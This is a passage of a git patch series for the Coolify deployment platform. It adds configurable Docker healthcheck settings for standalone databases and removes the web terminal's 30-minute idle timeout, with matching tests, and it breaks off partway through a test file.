diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index e72f4f1c6..4657f1d5e 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandaloneMongodb extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -47,11 +48,21 @@ class StandaloneMongodb extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
         'last_restart_at' => 'datetime',
@@ -120,6 +131,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->mongo_conf;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index 1c522d200..f3d0ad55f 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandaloneMysql extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -48,11 +49,21 @@ class StandaloneMysql extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'mysql_password' => 'encrypted',
         'mysql_root_password' => 'encrypted',
         'public_port_timeout' => 'integer',
@@ -116,6 +127,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->mysql_conf;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index 57dfe5988..39482892d 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandalonePostgresql extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -50,11 +51,21 @@ class StandalonePostgresql extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'init_scripts' => 'array',
         'postgres_password' => 'encrypted',
         'public_port_timeout' => 'integer',
@@ -158,6 +169,7 @@ public function deleteVolumes()
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->postgres_initdb_args.$this->postgres_host_auth_method;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index ef42d7f18..3d1d11138 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandaloneRedis extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -43,11 +44,21 @@ class StandaloneRedis extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
         'last_restart_at' => 'datetime',
@@ -115,6 +126,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->redis_conf;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Traits/HasDatabaseHealthCheck.php b/app/Traits/HasDatabaseHealthCheck.php
new file mode 100644
index 000000000..2602ecb23
--- /dev/null
+++ b/app/Traits/HasDatabaseHealthCheck.php
@@ -0,0 +1,34 @@
+<?php
+
+namespace App\Traits;
+
+/**
+ * Shared healthcheck behaviour for standalone database models.
+ *
+ * Standalone databases use a fixed, type-specific probe command (psql, redis-cli, ...),
+ * so only the timing fields and the enable/disable flag are configurable.
+ */
+trait HasDatabaseHealthCheck
+{
+    public function isHealthcheckEnabled(): bool
+    {
+        return (bool) ($this->health_check_enabled ?? true);
+    }
+
+    /**
+     * Build the Docker Compose healthcheck block for the given probe command.
+     *
+     * @param  array<int, string>  $test  The Docker `test` array (e.g. ['CMD', 'pg_isready']).
+     * @return array<string, mixed>
+     */
+    public function healthCheckConfiguration(array $test): array
+    {
+        return [
+            'test' => $test,
+            'interval' => ($this->health_check_interval ?? 15).'s',
+            'timeout' => ($this->health_check_timeout ?? 5).'s',
+            'retries' => $this->health_check_retries ?? 5,
+            'start_period' => ($this->health_check_start_period ?? 5).'s',
+        ];
+    }
+}
diff --git a/database/migrations/2026_05_31_000000_add_health_check_to_standalone_databases.php b/database/migrations/2026_05_31_000000_add_health_check_to_standalone_databases.php
new file mode 100644
index 000000000..63d7c3497
--- /dev/null
+++ b/database/migrations/2026_05_31_000000_add_health_check_to_standalone_databases.php
@@ -0,0 +1,47 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    private array $tables = [
+        'standalone_postgresqls',
+        'standalone_mysqls',
+        'standalone_mariadbs',
+        'standalone_redis',
+        'standalone_clickhouses',
+        'standalone_dragonflies',
+        'standalone_keydbs',
+        'standalone_mongodbs',
+    ];
+
+    public function up(): void
+    {
+        foreach ($this->tables as $table) {
+            Schema::table($table, function (Blueprint $table) {
+                $table->boolean('health_check_enabled')->default(true);
+                $table->integer('health_check_interval')->default(15);
+                $table->integer('health_check_timeout')->default(5);
+                $table->integer('health_check_retries')->default(5);
+                $table->integer('health_check_start_period')->default(5);
+            });
+        }
+    }
+
+    public function down(): void
+    {
+        foreach ($this->tables as $table) {
+            Schema::table($table, function (Blueprint $table) {
+                $table->dropColumn([
+                    'health_check_enabled',
+                    'health_check_interval',
+                    'health_check_timeout',
+                    'health_check_retries',
+                    'health_check_start_period',
+                ]);
+            });
+        }
+    }
+};
diff --git a/openapi.json b/openapi.json
index e83538f2b..d3d25bacc 100644
--- a/openapi.json
+++ b/openapi.json
@@ -4605,6 +4605,26 @@
                                     "mysql_conf": {
                                         "type": "string",
                                         "description": "MySQL conf"
+                                    },
+                                    "health_check_enabled": {
+                                        "type": "boolean",
+                                        "description": "Enable the database healthcheck probe."
+                                    },
+                                    "health_check_interval": {
+                                        "type": "integer",
+                                        "description": "Healthcheck interval in seconds."
+                                    },
+                                    "health_check_timeout": {
+                                        "type": "integer",
+                                        "description": "Healthcheck timeout in seconds."
+                                    },
+                                    "health_check_retries": {
+                                        "type": "integer",
+                                        "description": "Healthcheck retries count."
+                                    },
+                                    "health_check_start_period": {
+                                        "type": "integer",
+                                        "description": "Healthcheck start period in seconds."
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 523d453ff..469a0c38d 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2950,6 +2950,21 @@ paths:
                 mysql_conf:
                   type: string
                   description: 'MySQL conf'
+                health_check_enabled:
+                  type: boolean
+                  description: 'Enable the database healthcheck probe.'
+                health_check_interval:
+                  type: integer
+                  description: 'Healthcheck interval in seconds.'
+                health_check_timeout:
+                  type: integer
+                  description: 'Healthcheck timeout in seconds.'
+                health_check_retries:
+                  type: integer
+                  description: 'Healthcheck retries count.'
+                health_check_start_period:
+                  type: integer
+                  description: 'Healthcheck start period in seconds.'
               type: object
       responses:
         '200':
diff --git a/resources/views/livewire/project/database/configuration.blade.php b/resources/views/livewire/project/database/configuration.blade.php
index 73f87c0e3..c58232200 100644
--- a/resources/views/livewire/project/database/configuration.blade.php
+++ b/resources/views/livewire/project/database/configuration.blade.php
@@ -15,6 +15,8 @@
                 href="{{ route('project.database.servers', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Servers</span></a>
             <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.database.persistent-storage', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Persistent Storage</span></a>
+            <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
+                href="{{ route('project.database.health-checks', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Health Checks</span></a>
             @can('update', $database)
                 <a class='sub-menu-item' wire:current.exact="menu-item-active"
                     href="{{ route('project.database.import-backup', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Import Backup</span></a>
@@ -57,6 +59,8 @@
                 <livewire:project.shared.destination :resource="$database" />
             @elseif ($currentRoute === 'project.database.persistent-storage')
                 <livewire:project.service.storage :resource="$database" />
+            @elseif ($currentRoute === 'project.database.health-checks')
+                <livewire:project.database.health :database="$database" />
             @elseif ($currentRoute === 'project.database.import-backup')
                 <livewire:project.database.import :resource="$database" />
             @elseif ($currentRoute === 'project.database.webhooks')
diff --git a/resources/views/livewire/project/database/health.blade.php b/resources/views/livewire/project/database/health.blade.php
new file mode 100644
index 000000000..2e70f79b2
--- /dev/null
+++ b/resources/views/livewire/project/database/health.blade.php
@@ -0,0 +1,26 @@
+<form wire:submit='submit' class="flex flex-col">
+    <div class="flex items-center gap-2">
+        <h2>Health Checks</h2>
+        <x-forms.button canGate="update" :canResource="$database" type="submit">Save</x-forms.button>
+    </div>
+    <div class="mt-1 pb-4">Configure how Docker checks this database's health. A higher interval lowers
+        <code>dockerd</code>/<code>containerd</code> CPU and load on servers running many databases. Restart the
+        database to apply changes.</div>
+    <div class="flex flex-col gap-4">
+        <x-forms.checkbox canGate="update" :canResource="$database" instantSave id="healthCheckEnabled"
+            label="Enabled"
+            helper="When disabled, Docker runs no healthcheck probe for this database and Coolify can no longer report a healthy/unhealthy state." />
+        @if ($healthCheckEnabled)
+            <div class="flex gap-2">
+                <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckInterval"
+                    placeholder="15" label="Interval (s)" required />
+                <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckTimeout"
+                    placeholder="5" label="Timeout (s)" required />
+                <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckRetries"
+                    placeholder="5" label="Retries" required />
+                <x-forms.input canGate="update" :canResource="$database" min="0" type="number"
+                    id="healthCheckStartPeriod" placeholder="5" label="Start Period (s)" required />
+            </div>
+        @endif
+    </div>
+</form>
diff --git a/routes/web.php b/routes/web.php
index aed37a086..e4d6f477f 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -243,6 +243,7 @@
         Route::get('/servers', DatabaseConfiguration::class)->name('project.database.servers');
         Route::get('/import-backup', DatabaseConfiguration::class)->name('project.database.import-backup')->middleware('can.update.resource');
         Route::get('/persistent-storage', DatabaseConfiguration::class)->name('project.database.persistent-storage');
+        Route::get('/health-checks', DatabaseConfiguration::class)->name('project.database.health-checks');
         Route::get('/webhooks', DatabaseConfiguration::class)->name('project.database.webhooks');
         Route::get('/resource-limits', DatabaseConfiguration::class)->name('project.database.resource-limits');
         Route::get('/resource-operations', DatabaseConfiguration::class)->name('project.database.resource-operations');
diff --git a/tests/Feature/DatabaseHealthCheckTest.php b/tests/Feature/DatabaseHealthCheckTest.php
new file mode 100644
index 000000000..8bc1e4e92
--- /dev/null
+++ b/tests/Feature/DatabaseHealthCheckTest.php
@@ -0,0 +1,45 @@
+<?php
+
+use App\Models\StandalonePostgresql;
+
+it('defaults to an enabled healthcheck when nothing is configured', function () {
+    $database = new StandalonePostgresql;
+
+    expect($database->isHealthcheckEnabled())->toBeTrue();
+});
+
+it('builds the compose healthcheck block from the model timing fields', function () {
+    $database = new StandalonePostgresql([
+        'health_check_interval' => 30,
+        'health_check_timeout' => 7,
+        'health_check_retries' => 4,
+        'health_check_start_period' => 12,
+    ]);
+
+    $config = $database->healthCheckConfiguration(['CMD', 'pg_isready']);
+
+    expect($config)->toBe([
+        'test' => ['CMD', 'pg_isready'],
+        'interval' => '30s',
+        'timeout' => '7s',
+        'retries' => 4,
+        'start_period' => '12s',
+    ]);
+});
+
+it('falls back to safe defaults when timing fields are missing', function () {
+    $database = new StandalonePostgresql;
+
+    $config = $database->healthCheckConfiguration(['CMD', 'pg_isready']);
+
+    expect($config['interval'])->toBe('15s')
+        ->and($config['timeout'])->toBe('5s')
+        ->and($config['retries'])->toBe(5)
+        ->and($config['start_period'])->toBe('5s');
+});
+
+it('reports the healthcheck as disabled when the flag is false', function () {
+    $database = new StandalonePostgresql(['health_check_enabled' => false]);
+
+    expect($database->isHealthcheckEnabled())->toBeFalse();
+});

From b46d8e260146a7f6b50f2e9572d08588ecc858ee Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 31 May 2026 21:52:46 +0200
Subject: [PATCH 53/90] fix(terminal): keep sessions alive without hard
 timeouts

---
 app/Helpers/SshMultiplexingHelper.php         |  5 +--
 app/Livewire/Project/Shared/Terminal.php      | 31 ++++++++++++++++--
 config/constants.php                          |  1 +
 docker/coolify-realtime/terminal-server.js    | 32 ++-----------------
 package-lock.json                             |  8 ++---
 resources/js/terminal.js                      | 11 +------
 .../project/shared/terminal.blade.php         |  3 ++
 .../Feature/RealtimeTerminalPackagingTest.php | 29 ++++++++++++-----
 tests/Feature/SshMultiplexingLockTest.php     | 13 ++++++++
 9 files changed, 75 insertions(+), 58 deletions(-)

diff --git a/app/Helpers/SshMultiplexingHelper.php b/app/Helpers/SshMultiplexingHelper.php
index 021ac3608..d0bd8d3a3 100644
--- a/app/Helpers/SshMultiplexingHelper.php
+++ b/app/Helpers/SshMultiplexingHelper.php
@@ -69,7 +69,7 @@ public static function generateScpCommand(Server $server, string $source, string
         return $scpCommand.escapeshellarg($source).' '.self::escapedUserAtHost($server).':'.escapeshellarg($dest);
     }
 
-    public static function generateSshCommand(Server $server, string $command, bool $disableMultiplexing = false): string
+    public static function generateSshCommand(Server $server, string $command, bool $disableMultiplexing = false, ?int $commandTimeout = null): string
     {
         if ($server->settings->force_disabled) {
             throw new \RuntimeException('Server is disabled.');
@@ -80,7 +80,8 @@ public static function generateSshCommand(Server $server, string $command, bool
 
         self::validateSshKey($server->privateKey);
 
-        $sshCommand = 'timeout '.config('constants.ssh.command_timeout').' ssh ';
+        $commandTimeout = $commandTimeout ?? (int) config('constants.ssh.command_timeout');
+        $sshCommand = $commandTimeout > 0 ? "timeout {$commandTimeout} ssh " : 'ssh ';
 
         if (! $disableMultiplexing && self::isMultiplexingEnabled()) {
             $sshCommand .= self::multiplexingOptions($server);
diff --git a/app/Livewire/Project/Shared/Terminal.php b/app/Livewire/Project/Shared/Terminal.php
index bbc2b3e66..db65cdaad 100644
--- a/app/Livewire/Project/Shared/Terminal.php
+++ b/app/Livewire/Project/Shared/Terminal.php
@@ -12,6 +12,8 @@ class Terminal extends Component
 {
     public bool $hasShell = true;
 
+    public bool $isTerminalConnected = false;
+
     private function checkShellAvailability(Server $server, string $container): bool
     {
         $escapedContainer = escapeshellarg($container);
@@ -65,12 +67,20 @@ public function sendTerminalCommand($isContainer, $identifier, $serverUuid)
                 $dockerCommand = "sudo {$dockerCommand}";
             }
 
-            $command = SshMultiplexingHelper::generateSshCommand($server, $dockerCommand);
+            $command = SshMultiplexingHelper::generateSshCommand(
+                $server,
+                $dockerCommand,
+                commandTimeout: (int) config('constants.terminal.command_timeout')
+            );
         } else {
             $shellCommand = 'PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin && '.
                             'if [ -f ~/.profile ]; then . ~/.profile; fi && '.
                             'if [ -n "$SHELL" ] && [ -x "$SHELL" ]; then exec $SHELL; else sh; fi';
-            $command = SshMultiplexingHelper::generateSshCommand($server, $shellCommand);
+            $command = SshMultiplexingHelper::generateSshCommand(
+                $server,
+                $shellCommand,
+                commandTimeout: (int) config('constants.terminal.command_timeout')
+            );
         }
         // ssh command is sent back to frontend then to websocket
         // this is done because the websocket connection is not available here
@@ -84,6 +94,23 @@ public function sendTerminalCommand($isContainer, $identifier, $serverUuid)
         $this->dispatch('send-back-command', $command);
     }
 
+    #[On('terminalConnected')]
+    public function markTerminalConnected(): void
+    {
+        $this->isTerminalConnected = true;
+    }
+
+    #[On('terminalDisconnected')]
+    public function markTerminalDisconnected(): void
+    {
+        $this->isTerminalConnected = false;
+    }
+
+    public function keepTerminalPageAlive(): void
+    {
+        $this->isTerminalConnected = true;
+    }
+
     public function render()
     {
         return view('livewire.project.shared.terminal');
diff --git a/config/constants.php b/config/constants.php
index 89b633650..fd66a682a 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -35,6 +35,7 @@
         'protocol' => env('TERMINAL_PROTOCOL'),
         'host' => env('TERMINAL_HOST'),
         'port' => env('TERMINAL_PORT'),
+        'command_timeout' => 0,
     ],
 
     'pusher' => [
diff --git a/docker/coolify-realtime/terminal-server.js b/docker/coolify-realtime/terminal-server.js
index 42ca7c81d..c76383b9f 100755
--- a/docker/coolify-realtime/terminal-server.js
+++ b/docker/coolify-realtime/terminal-server.js
@@ -63,8 +63,8 @@ function createHttpError(response) {
 }
 
 const userSessions = new Map();
-const terminalDebugEnabled = ['1', 'true', 'yes'].includes(
-    String(process.env.TERMINAL_DEBUG || '').toLowerCase()
+const terminalDebugEnabled = ['local', 'development'].includes(
+    String(process.env.APP_ENV || process.env.NODE_ENV || '').toLowerCase()
 );
 
 function logTerminal(level, message, context = {}) {
@@ -154,7 +154,6 @@ const verifyClient = async (info, callback) => {
 const wss = new WebSocketServer({ server, path: '/terminal/ws', verifyClient: verifyClient });
 
 const HEARTBEAT_INTERVAL_MS = 30000;
-const IDLE_TIMEOUT_MS = 30 * 60 * 1000;
 
 wss.on('connection', async (ws, req) => {
     ws.isAlive = true;
@@ -168,7 +167,6 @@ wss.on('connection', async (ws, req) => {
         ptyProcess: null,
         isActive: false,
         authorizedIPs: [],
-        lastActivityAt: Date.now(),
         authReady: false,
         pendingMessages: [],
     };
@@ -260,29 +258,6 @@ const heartbeat = setInterval(() => {
         } catch (_) {
             // ignore — close handler will follow
         }
-
-        const session = ws.userId ? userSessions.get(ws.userId) : null;
-        if (session?.isActive && session.lastActivityAt && (Date.now() - session.lastActivityAt > IDLE_TIMEOUT_MS)) {
-            const idleMs = Date.now() - session.lastActivityAt;
-            logTerminal('warn', 'Closing terminal session due to idle timeout.', {
-                userId: ws.userId,
-                idleMs,
-                idleTimeoutMs: IDLE_TIMEOUT_MS,
-            });
-            try {
-                ws.send('idle-timeout');
-            } catch (_) {
-                // ignore — close still attempted below
-            }
-            killPtyProcess(ws.userId);
-            setTimeout(() => {
-                try {
-                    ws.close(1000, 'Idle timeout');
-                } catch (_) {
-                    // ignore — already closed
-                }
-            }, 100);
-        }
     });
 }, HEARTBEAT_INTERVAL_MS);
 
@@ -290,11 +265,9 @@ wss.on('close', () => clearInterval(heartbeat));
 
 const messageHandlers = {
     message: (session, data) => {
-        session.lastActivityAt = Date.now();
         session.ptyProcess.write(data);
     },
     resize: (session, { cols, rows }) => {
-        session.lastActivityAt = Date.now();
         cols = cols > 0 ? cols : 80;
         rows = rows > 0 ? rows : 30;
         session.ptyProcess.resize(cols, rows)
@@ -420,7 +393,6 @@ async function handleCommand(ws, command, userId) {
 
     userSession.ptyProcess = ptyProcess;
     userSession.isActive = true;
-    userSession.lastActivityAt = Date.now();
 
     ws.send('pty-ready');
 
diff --git a/package-lock.json b/package-lock.json
index bcacecc8b..9d495c412 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -1261,8 +1261,7 @@
             "version": "5.5.0",
             "resolved": "https://registry.npmjs.org/@xterm/xterm/-/xterm-5.5.0.tgz",
             "integrity": "sha512-hqJHYaQb5OptNunnyAnkHyM8aCjZ1MEIDTQu1iIbbTD/xops91NB5yq1ZK/dC2JDbVWtF23zUtl9JE2NqwT87A==",
-            "license": "MIT",
-            "peer": true
+            "license": "MIT"
         },
         "node_modules/clsx": {
             "version": "2.1.1",
@@ -1752,7 +1751,6 @@
             "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
             "dev": true,
             "license": "MIT",
-            "peer": true,
             "engines": {
                 "node": ">=12"
             },
@@ -1946,8 +1944,7 @@
             "version": "4.1.18",
             "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-4.1.18.tgz",
             "integrity": "sha512-4+Z+0yiYyEtUVCScyfHCxOYP06L5Ne+JiHhY2IjR2KWMIWhJOYZKLSGZaP5HkZ8+bY0cxfzwDE5uOmzFXyIwxw==",
-            "license": "MIT",
-            "peer": true
+            "license": "MIT"
         },
         "node_modules/tapable": {
             "version": "2.3.0",
@@ -1992,7 +1989,6 @@
             "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==",
             "dev": true,
             "license": "MIT",
-            "peer": true,
             "dependencies": {
                 "esbuild": "^0.27.0",
                 "fdir": "^6.5.0",
diff --git a/resources/js/terminal.js b/resources/js/terminal.js
index 7a7fc8536..cb3a26b3a 100644
--- a/resources/js/terminal.js
+++ b/resources/js/terminal.js
@@ -44,7 +44,7 @@ export function initializeTerminalComponent() {
             pendingCommand: null,
             // Last successfully sent SSH command — replayed after a transient reconnect
             // so the PTY respawns automatically. Cleared on intentional terminations
-            // (pty-exited, idle-timeout, unprocessable).
+            // (pty-exited, unprocessable).
             lastSentCommand: null,
             // Resize handling
             resizeObserver: null,
@@ -462,15 +462,6 @@ export function initializeTerminalComponent() {
 
                     // Notify parent component that terminal disconnected
                     this.$wire.dispatch('terminalDisconnected');
-                } else if (event.data === 'idle-timeout') {
-                    this.$wire.dispatch('error', 'Terminal closed after 30 minutes of inactivity.');
-                    this.terminalActive = false;
-                    if (this.term) {
-                        this.term.reset();
-                    }
-                    this.commandBuffer = '';
-                    this.lastSentCommand = null;
-                    this.$wire.dispatch('terminalDisconnected');
                 } else if (
                     typeof event.data === 'string' &&
                     (event.data.startsWith('Unauthorized:') || event.data.startsWith('Invalid SSH command:'))
diff --git a/resources/views/livewire/project/shared/terminal.blade.php b/resources/views/livewire/project/shared/terminal.blade.php
index c46c5f316..abcb366f5 100644
--- a/resources/views/livewire/project/shared/terminal.blade.php
+++ b/resources/views/livewire/project/shared/terminal.blade.php
@@ -1,4 +1,7 @@
 <div id="terminal-container" x-data="terminalData()">
+    @if ($isTerminalConnected)
+        <div class="hidden" aria-hidden="true" wire:poll.keep-alive.30s="keepTerminalPageAlive"></div>
+    @endif
     @if (!$hasShell)
         <div class="flex pt-4 items-center justify-center w-full py-4 mx-auto">
             <div class="p-4 w-full rounded-sm border dark:bg-coolgray-100 dark:border-coolgray-300">
diff --git a/tests/Feature/RealtimeTerminalPackagingTest.php b/tests/Feature/RealtimeTerminalPackagingTest.php
index ba01deca5..c478f79b8 100644
--- a/tests/Feature/RealtimeTerminalPackagingTest.php
+++ b/tests/Feature/RealtimeTerminalPackagingTest.php
@@ -58,22 +58,35 @@
         ->toContain("'Visibility-resume timeout'");
 });
 
-it('closes idle terminal sessions after 30 minutes on the server', function () {
+it('does not hard close terminal sessions after 30 minutes on the server', function () {
     $terminalServer = file_get_contents(base_path('docker/coolify-realtime/terminal-server.js'));
 
     expect($terminalServer)
-        ->toContain('IDLE_TIMEOUT_MS = 30 * 60 * 1000')
-        ->toContain('lastActivityAt')
-        ->toContain("ws.send('idle-timeout');")
-        ->toContain("ws.close(1000, 'Idle timeout');");
+        ->not->toContain('IDLE_TIMEOUT_MS = 30 * 60 * 1000')
+        ->not->toContain("ws.send('idle-timeout');")
+        ->not->toContain("ws.close(1000, 'Idle timeout');");
 });
 
-it('reacts to idle-timeout sentinel on the client and shows a user-facing error', function () {
+it('does not close the client terminal from an idle-timeout sentinel', function () {
     $terminalClient = file_get_contents(base_path('resources/js/terminal.js'));
 
     expect($terminalClient)
-        ->toContain("event.data === 'idle-timeout'")
-        ->toContain('Terminal closed after 30 minutes of inactivity.');
+        ->not->toContain("event.data === 'idle-timeout'")
+        ->not->toContain('Terminal closed after 30 minutes of inactivity.');
+});
+
+it('keeps Livewire alive in background tabs while a terminal is connected', function () {
+    $terminalComponent = file_get_contents(base_path('app/Livewire/Project/Shared/Terminal.php'));
+    $terminalView = file_get_contents(base_path('resources/views/livewire/project/shared/terminal.blade.php'));
+
+    expect($terminalComponent)
+        ->toContain('public bool $isTerminalConnected = false;')
+        ->toContain("#[On('terminalConnected')]")
+        ->toContain('public function markTerminalConnected(): void')
+        ->toContain('public function keepTerminalPageAlive(): void')
+        ->and($terminalView)
+        ->toContain('@if ($isTerminalConnected)')
+        ->toContain('wire:poll.keep-alive.30s="keepTerminalPageAlive"');
 });
 
 it('replays the last command on reconnect so the PTY respawns automatically', function () {
diff --git a/tests/Feature/SshMultiplexingLockTest.php b/tests/Feature/SshMultiplexingLockTest.php
index e97be1f50..b914765f6 100644
--- a/tests/Feature/SshMultiplexingLockTest.php
+++ b/tests/Feature/SshMultiplexingLockTest.php
@@ -73,6 +73,19 @@ function makeMuxServer(): Server
     Process::assertNothingRan();
 });
 
+it('can generate terminal ssh commands without a hard command timeout', function () {
+    config(['constants.ssh.mux_enabled' => true]);
+    $server = makeMuxServer();
